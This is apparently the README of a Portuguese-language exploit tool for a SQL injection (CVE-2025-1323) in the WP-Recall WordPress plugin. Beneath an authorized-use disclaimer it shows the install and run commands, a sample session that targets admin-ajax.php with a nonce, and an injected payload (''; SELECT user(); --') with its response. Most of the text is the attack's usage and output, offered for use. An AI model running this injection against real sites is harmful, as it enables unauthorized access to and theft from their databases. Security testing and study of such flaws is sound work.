
Injeção de SQL no Plugin WP-Recall
Injeção SQL no Plugin WP-Recall
Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e uso educacional.
Não utilize contra sistemas sem permissão explícita. O uso indevido pode ser ilegal.
requestsInstale as dependências:
pip install requests
python CVE-2025-1323.py
Insira a URL alvo (ex.: https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Insira o valor de ajax_nonce: 37c11b0c06
[*] Enviando payload: '; SELECT user(); --
[+] Resposta recebida:
{"result":"SQL error or leaked data here..."}